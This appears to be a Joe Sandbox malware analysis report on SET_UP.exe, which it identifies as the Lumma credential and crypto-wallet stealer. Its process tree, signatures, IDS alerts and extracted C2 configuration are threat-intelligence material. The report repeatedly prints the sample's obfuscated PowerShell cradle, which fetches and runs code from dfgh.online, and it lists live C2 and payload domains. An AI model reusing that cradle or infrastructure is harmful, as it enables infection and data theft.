Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SET_UP.exe

Overview

General Information

Sample name:SET_UP.exe
Analysis ID:1584507
MD5:7e62abcaf3030a9400fb60b5f2ee2484
SHA1:464edfd28fe39ebc0d2dae76660b3c6f1a047864
SHA256:84553c2f4085cc9ed47323ffd1b25bac55e216ba65b9ff45873bf6702da2553e
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SET_UP.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\SET_UP.exe" MD5: 7E62ABCAF3030A9400FB60B5F2EE2484)
    • powershell.exe (PID: 7800 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{ MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe (PID: 7960 cmdline: "C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
      • LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp (PID: 7976 cmdline: "C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$F0298,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
        • LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp (PID: 8056 cmdline: "C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$30470,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
            • timeout.exe (PID: 7268 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 2332 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5004 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5924 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 2924 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5296 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 3912 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 7300 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7264 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 7236 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5796 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5440 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 3844 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 3452 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 3624 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 1072 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 2284 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 1236 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 7744 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • BrightLib.exe (PID: 7748 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["abruptyopsn.shop", "nearycrepso.shop", "framekgirus.shop", "tirepublicerj.shop", "rabidcowse.shop", "cutefingeuker.click", "wholersorie.shop", "cloudewahsj.shop", "noisycuttej.shop"], "Build id": "hRjzG3--ELVIRA"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1909206800.000000000081A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2022408392.00000000028B0000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x52d79:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        Process Memory Space: SET_UP.exe PID: 7480JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: SET_UP.exe PID: 7480JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: PowerShell Download and Execution Cradles
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SET_UP.exe", ParentImage: C:\Users\user\Desktop\SET_UP.exe, ParentProcessId: 7480, ParentProcessName: SET_UP.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, ProcessId: 7800, ProcessName: powershell.exe
            Sigma detected: Suspicious PowerShell Parameter Substring
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SET_UP.exe", ParentImage: C:\Users\user\Desktop\SET_UP.exe, ParentProcessId: 7480, ParentProcessName: SET_UP.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, ProcessId: 7800, ProcessName: powershell.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SET_UP.exe", ParentImage: C:\Users\user\Desktop\SET_UP.exe, ParentProcessId: 7480, ParentProcessName: SET_UP.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, ProcessId: 7800, ProcessName: powershell.exe
            Sigma detected: PowerShell Web Download
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SET_UP.exe", ParentImage: C:\Users\user\Desktop\SET_UP.exe, ParentProcessId: 7480, ParentProcessName: SET_UP.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, ProcessId: 7800, ProcessName: powershell.exe
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SET_UP.exe", ParentImage: C:\Users\user\Desktop\SET_UP.exe, ParentProcessId: 7480, ParentProcessName: SET_UP.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, ProcessId: 7800, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SET_UP.exe", ParentImage: C:\Users\user\Desktop\SET_UP.exe, ParentProcessId: 7480, ParentProcessName: SET_UP.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{, ProcessId: 7800, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-05T18:02:18.829266+010020283713Unknown Traffic192.168.2.449748188.114.96.3443TCP
            2025-01-05T18:02:20.163505+010020283713Unknown Traffic192.168.2.449750188.114.96.3443TCP
            2025-01-05T18:02:21.525493+010020283713Unknown Traffic192.168.2.449751188.114.96.3443TCP
            2025-01-05T18:02:22.710941+010020283713Unknown Traffic192.168.2.449752188.114.96.3443TCP
            2025-01-05T18:02:24.878108+010020283713Unknown Traffic192.168.2.449753188.114.96.3443TCP
            2025-01-05T18:02:26.330947+010020283713Unknown Traffic192.168.2.449754188.114.96.3443TCP
            2025-01-05T18:02:27.341178+010020283713Unknown Traffic192.168.2.449755188.114.96.3443TCP
            2025-01-05T18:02:28.299990+010020283713Unknown Traffic192.168.2.449756188.114.96.3443TCP
            2025-01-05T18:02:29.529144+010020283713Unknown Traffic192.168.2.449757185.161.251.21443TCP
            2025-01-05T18:02:30.287392+010020283713Unknown Traffic192.168.2.449758104.21.37.128443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-05T18:02:19.580500+010020546531A Network Trojan was detected192.168.2.449748188.114.96.3443TCP
            2025-01-05T18:02:20.919112+010020546531A Network Trojan was detected192.168.2.449750188.114.96.3443TCP
            2025-01-05T18:02:28.770787+010020546531A Network Trojan was detected192.168.2.449756188.114.96.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-05T18:02:19.580500+010020498361A Network Trojan was detected192.168.2.449748188.114.96.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-05T18:02:20.919112+010020498121A Network Trojan was detected192.168.2.449750188.114.96.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-05T18:02:30.643871+010020084381A Network Trojan was detected104.21.37.128443192.168.2.449758TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-05T18:02:27.818132+010020480941Malware Command and Control Activity Detected192.168.2.449755188.114.96.3443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://klipvumisui.shop/int_clp_sha.txtf1$mAvira URL Cloud: Label: malware
            Source: https://klipvumisui.shop/int_clp_sha.txtFmsZrAvira URL Cloud: Label: malware
            Source: https://cegu.shop/uAvira URL Cloud: Label: malware
            Source: https://dfgh.online/invoAvira URL Cloud: Label: malware
            Source: https://klipvumisui.shop/YAvira URL Cloud: Label: malware
            Source: https://klipvumisui.shop/LAvira URL Cloud: Label: malware
            Source: https://klipvumisui.shop/Avira URL Cloud: Label: malware
            Source: https://cegu.shop/8574262446/ph.txtk9Avira URL Cloud: Label: malware
            Source: https://dfgh.online/invoker.php?compName=hZAvira URL Cloud: Label: malware
            Found malware configuration
            Source: SET_UP.exe.7480.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "nearycrepso.shop", "framekgirus.shop", "tirepublicerj.shop", "rabidcowse.shop", "cutefingeuker.click", "wholersorie.shop", "cloudewahsj.shop", "noisycuttej.shop"], "Build id": "hRjzG3--ELVIRA"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeReversingLabs: Detection: 73%
            Multi AV Scanner detection for submitted file
            Source: SET_UP.exeVirustotal: Detection: 8%Perma Link
            Source: SET_UP.exeReversingLabs: Detection: 18%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.0% probability
            Source: SET_UP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.4:49758 version: TLS 1.2
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00498514 FindFirstFileW,GetDriveTypeW,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,0_2_00498514
            Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_004B8FD2 FindFirstFileW,FindClose,0_2_004B8FD2

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49756 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49750 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 188.114.96.3:443
